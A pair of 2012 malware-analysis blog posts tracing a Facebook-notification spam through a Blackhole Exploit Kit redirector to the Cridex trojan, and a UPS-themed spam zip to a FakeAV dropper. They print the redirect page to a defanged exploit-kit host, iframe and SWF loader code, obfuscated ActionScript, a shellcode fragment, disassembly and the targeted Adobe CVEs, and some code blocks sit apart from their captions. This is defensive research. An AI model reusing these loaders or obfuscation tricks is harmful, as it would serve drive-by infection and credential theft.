Email is now working again too.
This is featured post 1 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha -

This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha -

This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha -

Chủ Nhật, 25 tháng 11, 2012

Email is now working again too.

Important Case Infector Summary:Fake Facebook Notif.(hacked WordPress)Redirector Host/IP:
Blackhole Domain:
Blackhole IP:,,,
Blackhole Proxy Port: 8080
Cridex CNC host: Path: /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
I was reported the below spam infection by @Hulk_Crusader,
which I opened as HTML like as per below sample:
Which the links made me redirected into a WordPress blog page:
↑which lead me to another url as per mentioned above..
I downloaded it to receive HTML page with the below contents, lead us to Blackhole EK<html>Is BHEK's URL patternm, I fetched the column.php in the "right" way,
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
if(var1==var2) {document.location="h00p://delemiator・ru:8080/forum/links/column.php";}
</html>// contains obfuscated PluginDetect 0.7.9 snipped below:
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie was just knocking!
--referer (referer) to h00p://
--15:20:35-- h00p://
=> `column.php'
Resolving seconds 0.00,,,, ...
Caching =>
Connecting to||:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5340 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:
Accept: */*
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 06:20:32 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
15:20:39 (109.45 KB/s) - `column.php' saved [90019]
Here's the original version-->>[PASTEBIN]Decoding Guide of Obfuscated PluginDetect 0.7.9
I made an easy Decoding Guide on how to code manually here -->>[PASTEBIN]And here's the beautiful format of PluginDetect 0.7.9 burped -->>[PASTEBIN]Malicious infector files inside of this Exploit Kit
In this post I will focus on writing how to flush BHEK2 malwares. I'll go first with the wellknown malicious infectors "I know" then go to decode - PluginDetect code to burps the rest of the infectors. 1) Firstly, I downloaded a well-known components like: spn.jar, spn2.jar, spn3.jar, t.pdf and getJavaInfo.jar As per described here --->>[PASTEBIN]↑These samples is as per previously analyze post here -->>[HERE] OK, next, we must see the code, let's seek the PDF infector malwares first... 2) There are 2(two) functions of PDF downloader, p1() & p2(), code is below:function p1()Here's how I cracked & downloaded those files-->>[PASTEBIN]I named it infector1.pdf and infector2.pdf, below is analysis report & guide how to decode:
var d=document.createElement("div");
d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
function p2()
var d=document.createElement("div");
d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
}The infector1.pdf Contains 4(four) Adobe Exploit & a shellcode to download malware payload. Adobe version condition per CVE used to infection is as follow: Adobe ver 9 or ver==8 or before 8.12 ====> CVE-2009-0927 Adobe ver 7.1 ====> CVE-2008-2992 Adobe ver 6 or ver 7 before ver < 7.11 ===> CVE-2007-5659 Adobe ver >= 9.1 or ver <= 9.2 or ver >= 8.13 or ver <= 8.17==> CVE-2009-4324 Full guide to analysis is here --->>[PASTEBIN]The infector2.pdfContains 1(one) Adobe exploit & shellcode to download malware payload. Exploit CVE-2010-0188 Aiming Adobe Reader ver <= 9.3 of Windows OS. Reference is here -->>[Adobe]Full guide to analysis is here --->>[PASTEBIN]3) I saw 2(two) functions of SWF downloader, function getCN() & function ff2(), code is as per follows:function getCN()Just decode the url as per above PDF method, Here's my log in downloading whose SWF's -->>[PASTE]
return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
function ff2()
var oSpan=document.createElement("span");
var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
document.body.appendChild(oSpan); }The details of reversing BHEK 2.x/Plugindetect 0.7.9's field.swf & score.pdf
*) Thanks to @Hulk_Crusader, @Cephrus & @EricOpdyke for stick together to crack this :-)The first swf "field.swf" contains malicious JavaScript Code as per hexed here-->>[PASTEBIN]How the bad guys obfuscating this JS code to avoid AV detction is as follows:1. The usage of variables with dullname(n+1) like:OK, we can read it. Now what does it mean? Here's the simple explanation:_local1, _local2, _localn,...,_localn+12. Camouflage of the malicious JS functions, like:[((((("c" + "") + "") + "a") + "l") + "l")]((((((("g" + "") + "e") + "t") + "C") + "") + "N"));↑This means calling function of callgetCN(), or...[((((("c" + "a") + "") + "l") + "") + "l")]((((((((((((("g" + "e") + "t") + "") + "B") + "l") + "o") + "c") + "k") + "S") + "i") + "z") + "e"));↑This means calling function of getBlockSize(), or...[((((("c" + "") + "a") + "l") + "") + "l")]((((((((((((((("g" + "") + "e") + "") + "t") + "A") + "l") + "l") + "o") + "c") + "S") + "") + "i") + "z") + "e"));↑This means calling function of getAllocSize(), or..[((((("c" + "") + "a") + "") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "A") + "l") + "l") + "o") + "cC") + "o") + "u") + "n") + "t"));↑This means calling function of getAllocCount(), or..[((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")]↑This means calling function of writeMultiByte(), etc. 3. Furthermore malicious exploit exec calls using same obfuscation like:[((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (("u" + "t") + "f-16"));↑This means:writeMultiByte(call(getfillBytes,utf-16));4. And also the execution of the shellcode function written in PluginDetect:[(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "ti") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "S") + "h") + "e") + "l") + "l") + "C") + "o") + "d") + "e"))), (((("u" + "t") + "f-") + "1") + "6"));↑This means:writeMultibyte(call(getShellCode,utf-16));5. Some strings manipulation also being obfuscated, like below real example:_local13[(((((((("p" + "o") + "s") + "i") + "t") + "") + "i") + "o") + "n")]↑This command means: position, to be used in the next variable, like:_local13.writeBytes(_local12);you should replace them like the below to make sense of it:position.writeBytes(_local12);Where the _local12 can be traced↓var _local12:* = new ByteArray();which goes straight to shellcode execution written in PluginDetect logic. 6. You will see some variable initiate with what looks like unused strings like:
_local17 = _local12;
_local17[(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "By") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (((("u" + "t") + "f-") + "1") + "6"));
//↑writeMultibyte(call(getShellCode,utf-16));var _local4:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";↑The above string only "_local4" is being used (to be pased into [score.swf]), the rest are actually a garbage.
var _local15:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";
var _local16:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?abXwu!cncl!JvcaWTqyXpNorkEnVldW?GYgGNDmSKFwiEqauSYTMSRmIrBEQwPxb-rbHuxiz-@ic&tPh!&BVADXW@jFCGwrEQmlBuAQHtpFW-ajxa*!wKo&KcnqoEsVWnO-aXJcDIMlwkshdPm*JncJVIilDxtaQbYIWzBaSYawQ!eX?rGsri!RVQYLBiCCqpooHhHP#AozyrvUdcCtYVsvIyoP?WUJMcOPJf!qoMOiPVWL+Pmuz-LLmU+xXLT#OAaA+!PhP*MjQse?uRnGgWqNC!iM?zOat#!sbxmeH-ZCEwAucUXgRuPbNGvPzUy+Yn@&oCQwpVWWTcuqEUBpZrv!bC-KzMZMr!d*Ly@nN*x!oSECeqnaF&ZCeNOcFbphES#wg*NAmvuT!MAo#fKBN*&rozfkba@!&tidlLTl?ECrkAAcRsO#E&b?@G?iEhhrUAMqjsfhSk#+nLDKJGViEWdjyNFNLwUh+kbRyGXzLOxxOBLuk-LuqnG??dVzAdKTbcBp&e@YvgMctjX!SOBYCoIqEQLW+KaVUBS*xLfG#xDpSEbotTKYcGv!iK?*!nUbucr-FGH+saxGXoV?IyaH!On+r-WHZ+IQTJZNTt@uPxcaNBeFd?wUipECbXswVKTUoErnLe-CTI*PyxRPu?YXGQVs?R*A-IkjyYeSCLceakszQAMmMviflWSlgoDmROlff@*mcvnPyAblAHjAkXh#LpychVfF#GQNYDd#tuGNhYQaM#wLlTty*O@+NlrgkEFLDwgP?H!kznkUgQvbnbzivKgXiDvdtlWur-kqvvuxIRWHNcsgM-bS-BwcMVqJ&NWKdqPmPt?EHSSoXTXYscBhPxlOpiRhrXdNlohJDh!s*&GekAyGVp*CbOgLsprkECHgIEkyBtKqL-jtNaFdSZqxQAsXpeSsmugPdgupvIHHiW!QX#BKjQWuqMrcHvCeA&OMxcbzlKUfJkyAELR#FftyTrHHAVa&ZCu&XYeDoEqwahfdnbQ#rInjyEYZKMIyjCOspckK-vwTYWzUwqlTSbRiHekhfCMBU&LURksZzatvbsJJnC!OaCrNiAbLoeerfKfNYE*BDvxOGfZ?xtdZcJ&TRlvVUKgRFBrDjca@cCnG&&FfFNreRgP@xHfVglB!WZMzLhdnTxYpprLbgGCpA#SLtllz-rc";1. It loads the url defined in PluginDetect at [getCN()] function which as per explained above will download the score.swf2. Exploit the CVE-2011-0611 using the shellcode provided by the [PluginDetect shellcode()] then execute payload download, or.. 3. ..will lead you to directly download payload.The second swf (score.swf) was decoded here-->>[PASTEBIN]field.swf has the obfuscation pattern as per below:1. The usage of clattered strings to camouflage the real meaning:How the Exploit of score.swf goes?[(((((((((("v" + "") + "e") + "r") + "") + "s") + "i") + "o") + "") + "") + "n")];↑This means "version" 2. Obfuscation of Java command in clattered strings in a var:_local3[((((("r" + "e") + "ve") + "r") + "s") + "e")]();↑This means the usage of function: reverse() 3. A "hidden" swap operation of particular strings to null to deobfs code:_local2 = this.str_replace(_local2, ((((((((((((((("!" + "X") + "X") + "") + "X") + "X") + "!0") + "3") + "9") + "4") + "3") + "4!") + "X") + "X") + "X") + "!"), "");↑This means: str_replace("!XXXX!039434XXX!","") command. PS: Many swf malware JS/obfus using this method as per the below case in: i) Contagio blog -->>[HERE], and ii)StopMalvertising blog -->>[HERE]4. There is an important obfuscation which is the clue of exploit used:_local14[(((((((((((("" + "l") + "o") + "") + "a") + "d") + "B") + "y") + "t") + "e") + "") + "") + "s")](this.h2b(_local2));↑This explains loadBytes() and addChild() flash Java functions which are used to load and execute a media.
_local14 = this;
_local14[((((((((((("a" + "") + "d") + "") + "d") + "") + "") + "C") + "h") + "i") + "l") + "d")](_local4);In this file there's a strings of bytes as per below:I spent enough time to test score.swf, resulted to that direct payload isn't exist. Yet as per its name, is used to "score" exploit state for execution arbitrary- code of OTHER JS/Code evil functions (either in PluginDetect, other SWF or PDFs) that related to the dropping/downloading payloads of BHEK2.x set. The memory dump of score.swf is here--->>[PASTEBIN]_local13 = new array(54, 54, 69, 51, 54, 57, 65, 48, 49, 48, 70, 70, 48, 69, 53, 52, 56, 49, 53, 48, 57, 53, 70, 50, 49, 70, 49, 68, 70, 51, 54, 48, 57, 53, 54, 68,...which is gathered by the below generator:_local2 = "";And after filtered and reversed() thus will be load into memory with loadBytes() and addChild() mentioned above. You will see the swf will be crashed & freeing a pointer as per described in- the PoC of CVE-2012-0769 described in BlackHat US 2012-->>[HERE]The concept is the same in pattern of PoC:
i = 0;
while (i < _local13.length) {
_local2 = (_local2 + string.fromcharcode(_local13[i]));
};for(i=0;i<0x200;i++){bd=new BitmapData(size,0x1,false,0xCCCCCC);} //<#jackpot!In our case, square pattern was written in strings executed by addChild()Conclusion:
1. score.swf,field.swf & PluginDetect's JS functions are calling to each other. implied a set of package, inseparable. 2. Every java functions from PluginDetect0.7.9 are calling to functions under components of infectors after being loaded, and scheme of Exploit + Infections runs in memory, suggesting that all trace of infection can be trace in Forensics or Dynamic Memory Analysis. 3. It is important to know how these moronz obfuscating the code, for the automation tools adjusted and detect these properly.4) And we have a shellcode functions as below:function getShellCode()It is important to remember that inside of - this shellcode there is a connection with payload, usually via url, or it dropped binary to download he payloads.. The decoding guide is in here --->>[PASTEBIN] The downloaded payload is a Cridex Trojan, with the following activities:
var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!..
return str_replace((window.document)?"%!":"", "%u", a) }1. Copied files (itself) using API: CopyFileW(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0)For the registry, it made an autorun, change the internet setting & cache, and put a long encrypted data too. Here's Registry Shoot data-->>[PASTEBIN] As for the Network Analysis, it did HTTP/POST to Sending request POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Communication to CNC in snipped txt is here --->>[PASTEBIN] The malware process that I snapped is as per below:
Into directory:
C:\Documents and Settings\User\Application Data\KB00085031.exe
2. Do the self deletion after drop...
3. Creating three memory injection processes:
CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xf0ed50, lpParameter: 0xf00000, dwCreationFlags: 0x0, lpThreadId: 0x0)
CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x92ed50, lpParameter: 0x920000, dwCreationFlags: 0x0, lpThreadId: 0x0)
CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x2a5ed50, lpParameter: 0x2a50000, dwCreationFlags: 0x0, lpThreadId: 0x0)
4. Which resullted the new processes appears below:
0xb8 KB00085031.exe
0xec cmd.exe 0x7e4
0x348 svchost.exe
5. Sends your credentials data to the remote hosts....Previous reference of this trojan like analyzed in previous post here -->>[HERE]*) For the Network & Registry analysis raws can be fetched below the sample download.
Here's the pic of the total captured files in this story:Here's the sample for the research purpose -->>[CLICK]Here's the PCAP & RegShot full data download -->>[CLICK]Here's my LOG during analysis -->>[CLICK] Below is the VT Analysis Result of unique samples: column.php abcd2644de8c447578d88dd4fd1e3508 VT(2/44) field.swf aab57a979a6411578ae66ed676394d12 VT(8/44) infector1.pdf 465cb634d94d0b16cc1828b6222f0e09 VT(19/44) infector2.pdf 4bb885be4b547aa70d4910422f89d546 VT(20/44) score.swf 8ee6d435e5bb423671bd03728745bd0b VT(9/44) spn.jar 61db98323b8d0512e618f74f70d583ae VT(2/44) spn2.jar 8d0f9fc0a05b2acaecfef2f5d88a1121 VT(4/44) spn3.jar d56e54b431189a1b2a02be243574e829 VT(3/44) t.pdf d1e2ff36a6c882b289d3b736d915a6cc VT(21/43) wpbt0.dll 8229f69bc416cdca7f314f19fe7b4e18 VT(6/42)
Thứ Bảy, 24 tháng 11, 2012

Infection Summary
1. Drive by spam
2. w/html URL to h00p:// ←Troj/Downloader's dropper
3. Trojan Download FakeAV installer from IPs`: (Spain), (Taiwan), (Taiwan) & (Spain)
4. Send data to these IP:, (Taiwan)
5. Support Center is in this IP: (Spain)
All of the data written is as per it is, for the law evidence & research purpose I also share the samples and captures. I am so sorry for taking so long analyzing this, since I have only one windows machine to perform all of this analysis.
Here we go..
Following another reported UPS email like below...
Which lead us to the link:h00p://proyectosnavarra・es/CMUNFWKUWY.htmlOne thing I LOVE of spam infection is we can fetch it well...--15:36:04-- h00p:// a zip alright...
=> `'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 93,060 (91K) [application/x-zip-compressed]
15:36:07 (56.43 KB/s) - `' saved [93060/93060]0000 50 4B 03 04 14 00 00 00 08 00 45 87 77 41 F1 63 PK........E.wA.cAnd this zip file contains a malware (see pic below)
0010 BA 03 FE 6A 01 00 00 5C 02 00 12 00 00 00 50 6F ...j..........Po
0020 73 74 61 6C 5F 52 65 63 65 69 70 74 2E 65 78 65 stal_Receipt.exe
0030 EC BD 7D 7C 54 D5 B5 30 7C 66 E6 64 72 92 4C 72 ..}|T..0|f.dr.Lr
0040 06 48 30 40 80 00 41 D1 A0 46 87 68 E2 10 9C 18 .H0@..A..F.h....
0050 26 C4 8F E0 C4 C0 0C 11 12 E8 15 D2 38 A5 95 C2 &...........8...
0060 39 80 95 40 D2 93 A1 39 39 8E A5 AD DC 6B AF 7A 9..@...99....k.z
0070 2B 0F 7A 1F 7D DA DB DA 56 3E FC 00 67 08 E6 43 +.z.}...V>..g..C
0080 91 86 8F 62 28 41 07 4D 71 8F 27 62 10 4C 26 10 ...b(A.Mq.'b.L&.
0090 72 9E B5 F6 99 99 04 DB FB DE BE EF EF 3E EF FB r............>..
00A0 CF CB 8F 39 67 7F AC BD F6 DA 6B AF BD F6 5A FB ...9g.....k...Z.What's inside?
// extract it...
$ unzip ./
Archive: ./
extracting: Postal_Receipt.exe
//File timestamps..
-rwxr-xr-x 1 xxx xxx 154624 Nov 23 16:58 Postal_Receipt.exe* <=== see the creaion date, new!Binary Analysis
Let's "surgery" this Postal_Receipt.exe, looks like a plain PE:0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............Some details of binary:
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 D1 46 30 9D 95 27 5E CE 95 27 5E CE 95 27 5E CE .F0..'^..'^..'^.
0090 06 69 C6 CE 94 27 5E CE 8E BA F5 CE B5 27 5E CE .i...'^......'^.
00A0 8E BA C0 CE 86 27 5E CE 8E BA F4 CE E3 27 5E CE .....'^......'^.
00B0 9C 5F CD CE 90 27 5E CE 95 27 5F CE CB 27 5E CE ._...'^..'_..'^.
00C0 8B 75 DA CE 94 27 5E CE 8B 75 CF CE 94 27 5E CE .u...'^..u...'^.
00D0 52 69 63 68 95 27 5E CE 00 00 00 00 00 00 00 00 Rich.'^.........
00E0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L...
00F0 C0 63 AF 50 00 00 00 00 00 00 00 00 E0 00 03 01 .c.P............Sections:It has the strings here --->>[CLICK]This is strings with calls -->>[CLICK]Also is having Calls/DLL List here -->>[CLICK]Having the Functions list here--->>[CLICK]*) those similar functions often seen in the crypted malwares... //Upon starts this binary get environment & execute command line:
.text 0x1000 0xcfe1 53248
.rdata 0xe000 0x29d0 10752
.data 0x11000 0x3a84 7680
.rsrc 0x15000 0x13ed0 81920
Entry Point at 0xe87
Virtual Address is 0x401a87
Compiler: Microsoft Visual C++ 8
CRC Check Failed, Claimed: 0 Actual: 191423
Compile Time: 0x50AF63C0 [Fri Nov 23 11:53:36 2012 UTC]
MIMEType : application/octet-stream
Subsystem : Windows GUI
MachineType : Intel 386 or later, and compatibles
TimeStamp : 2012:11:23 11:53:36+00:00
FileType : Win32 EXE
PEType : PE32
CodeSize : 53248
LinkerVersion : 9.0
EntryPoint : 0x1a87
InitializedDataSize : 100352
SubsystemVersion : 5.0
OSVersion : 5.0loc_40191A://Other OP i.e. creating+write files, Get/Create/Terminate Process acts -->>[CLICK]Also a dialog-box OP like below w/File Operations, Implied a GUI↓ // Some file w/dialog box...see a lot of these in FakeAV Malwares...
push 58h
push offset unk_40FF80
call sub_403D40
lea eax, [ebp-68h]
push eax ; lpStartupInfo
call ds:GetStartupInfoW
xor esi, esi
cmp dword_414A6C, esi
jnz short loc_401945
call ds:GetCommandLineA
mov dword_414A68, eax
call sub_405C67
mov lpMem, eax
call sub_405BAC
test eax, eax
jns short loc_4019EF
loc_401A24:.text:0040DF5A align 10h
.text:0040DF60 push ebp
.text:0040DF61 mov ebp, esp
.text:0040DF63 mov eax, ds:ChooseFontW ; Create a Font common dialog box
.text:0040DF68 mov dword_412C84, eax
.text:0040DF6D mov ecx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DF73 mov dword_412C88, ecx
.text:0040DF79 mov edx, ds:PageSetupDlgW ; Create a Page Setup dialog box for
.text:0040DF79 ; specifying the attributes of a printed page
.text:0040DF7F mov dword_412C8C, edx
.text:0040DF85 mov eax, ds:FindTextW ; Create a system-defined modeless
.text:0040DF85 ; dialog box for text-search
.text:0040DF8A mov dword_412C90, eax
.text:0040DF8F mov ecx, ds:PrintDlgExW
.text:0040DF95 mov dword_412C94, ecx
.text:0040DF9B mov edx, ds:GetFileTitleW ; Extract FileName from FullName
.text:0040DFA1 mov dword_412C98, edx
.text:0040DFA7 mov eax, ds:GetOpenFileNameW ; Create an Open common dialog box
.text:0040DFAC mov dword_412C9C, eax
.text:0040DFB1 mov ecx, ds:ReplaceTextW ; Create a system-defined modeless
.text:0040DFB1 ; dialog box for text-replace
.text:0040DFB7 mov dword_412CA0, ecx
.text:0040DFBD mov edx, ds:CommDlgExtendedError ; Get a common dialog box error code
.text:0040DFC3 mov dword_412CA4, edx
.text:0040DFC9 mov eax, ds:GetSaveFileNameW ; Create a Save common dialog box
.text:0040DFCE mov dword_412CA8, eax
.text:0040DFD3 mov ecx, ds:ChooseFontW ; Create a Font common dialog box
